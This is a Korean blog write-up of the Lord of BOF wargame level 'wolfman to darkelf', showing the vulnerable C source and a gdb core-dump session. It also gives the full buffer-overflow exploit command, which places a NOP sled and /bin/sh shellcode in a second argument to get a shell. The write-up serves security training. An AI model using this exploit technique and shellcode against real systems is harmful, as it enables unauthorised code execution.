6. wolfman → darkelf

wargame 🏴‍☠️ write-up/Lord of BOF

6. wolfman → darkelf

Kortsec1 2019. 5. 2. 18:06

[wolfman@localhost wolfman]$ cat -n darkelf.c 
     1	/*
     2	        The Lord of the BOF : The Fellowship of the BOF
     3	        - darkelf 
     4	        - egghunter + buffer hunter + check length of argv[1]
     5	*/
     6	
     7	#include <stdio.h>
     8	#include <stdlib.h>
     9	
    10	extern char **environ;
    11	
    12	main(int argc, char *argv[])
    13	{
    14		char buffer[40];
    15		int i;
    16	
    17		if(argc < 2){
    18			printf("argv error\n");
    19			exit(0);
    20		}
    21	
    22		// egghunter 
    23		for(i=0; environ[i]; i++)
    24			memset(environ[i], 0, strlen(environ[i]));
    25	
    26		if(argv[1][47] != '\xbf')
    27		{
    28			printf("stack is still your friend.\n");
    29			exit(0);
    30		}
    31	
    32		// check the length of argument
    33		if(strlen(argv[1]) > 48){
    34			printf("argument is too long!\n");
    35			exit(0);
    36		}
    37	
    38		strcpy(buffer, argv[1]); 
    39		printf("%s\n", buffer);
    40	
    41	        // buffer hunter
    42	        memset(buffer, 0, 40);
    43	}

5. orc => wolfman 때는 argv[1]에다가 \x90 100개와 쉘코드를 모두 넣어서 풀었습니다.

하지만, 이번에는 32번째 줄에서 부터 argv[1]의 길이를 제한하네요..

머 그럼 argv[2]에다가 넣으면 되지요~

바로 한번 해볼까요?

[wolfman@localhost wolfman]$ ./test `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf " + 
"\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1
\x99\xb0\x0b\xcd\x80"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)

core파일 쓱쓱,,,

[wolfman@localhost wolfman]$ gdb -c core
#0  0xbfbfbfbf in ?? ()
(gdb) x/100wx $esp
0xbffffa60:	0x00000000	0xbffffaa4	0xbffffab4	0x40013868
0xbffffa70:	0x00000003	0x08048450	0x00000000	0x08048471
0xbffffa80:	0x08048500	0x00000003	0xbffffaa4	0x08048390
0xbffffa90:	0x0804864c	0x4000ae60	0xbffffa9c	0x40013e90
0xbffffaa0:	0x00000003	0xbffffba8	0xbffffbaf	0xbffffbe0
0xbffffab0:	0x00000000	0xbffffc5d	0xbffffc6f	0xbffffc87
0xbffffac0:	0xbffffca6	0xbffffcc8	0xbffffcd5	0xbffffe98
0xbffffad0:	0xbffffeb7	0xbffffed4	0xbffffee9	0xbfffff08
0xbffffae0:	0xbfffff13	0xbfffff2c	0xbfffff3c	0xbfffff44
0xbffffaf0:	0xbfffff4e	0xbfffff5e	0xbfffff6c	0xbfffff7a
0xbffffb00:	0xbfffff8b	0xbfffff96	0xbfffffa9	0xbfffffec
0xbffffb10:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffb20:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffb30:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffb40:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffb50:	0x000001f9	0x0000000c	0x000001f9	0x0000000d
0xbffffb60:	0x000001f9	0x0000000e	0x000001f9	0x00000010
0xbffffb70:	0x0f8bfbff	0x0000000f	0xbffffba3	0x00000000
0xbffffb80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffba0:	0x69000000	0x00363836	0x65742f2e	0x41007473
0xbffffbb0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbc0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbd0:	0x41414141	0x41414141	0xbf414141	0x00bfbfbf
0xbffffbe0:	0x90909090	0x90909090	0x90909090	0x90909090
(gdb) 
0xbffffbf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc40:	0x90909090	0x6850c031	0x68732f2f	0x69622f68
0xbffffc50:	0x50e3896e	0x99e18953	0x80cd0bb0	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcf0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd70:	0x00000000	0x00000000	0x00000000	0x00000000

\x90가 바로 보이네요 그럼또 darkelf로 마무리합시다~

[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44 + "\x10\xfc\xff\xbf " + 
"\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1
\x99\xb0\x0b\xcd\x80"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
bash$ my-pass
euid = 506
kernel crashed
bash$

너무 쉽지 않나요..ㅠㅠ 쨋든 이렇게 또 wolfman을 클리어했습니다~~

'wargame 🏴‍☠️ write-up > Lord of BOF' 카테고리의 다른 글

8. orge → troll (0)	2020.12.13
7. darkelf → orge (0)	2020.12.13
5. orc → wolfman (0)	2019.05.02
4. goblin → orc (0)	2018.07.26

현재글6. wolfman → darkelf

관계자외 출입 금지

jenkins, Vulnerability, SSTI, 구문 분석, 2023 Top 10, 대상 파일, ir code, 취약점, RCE, James Kettle, PortSwigger, CVE-2024-23897, web, expandAtFiles, 중간 코드, h4cking game, 실행 파일 형식, cl.cl, PowerShell, 어휘 분석,

Today :
Yesterday :

보안

6. wolfman → darkelf

'wargame 🏴‍☠️ write-up > Lord of BOF' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of BOF'의 다른글

티스토리툴바

« 2025/01 »
일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

6. wolfman → darkelf

'wargame 🏴‍☠️ write-up > Lord of BOF' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of BOF'의 다른글

관련글

티스토리툴바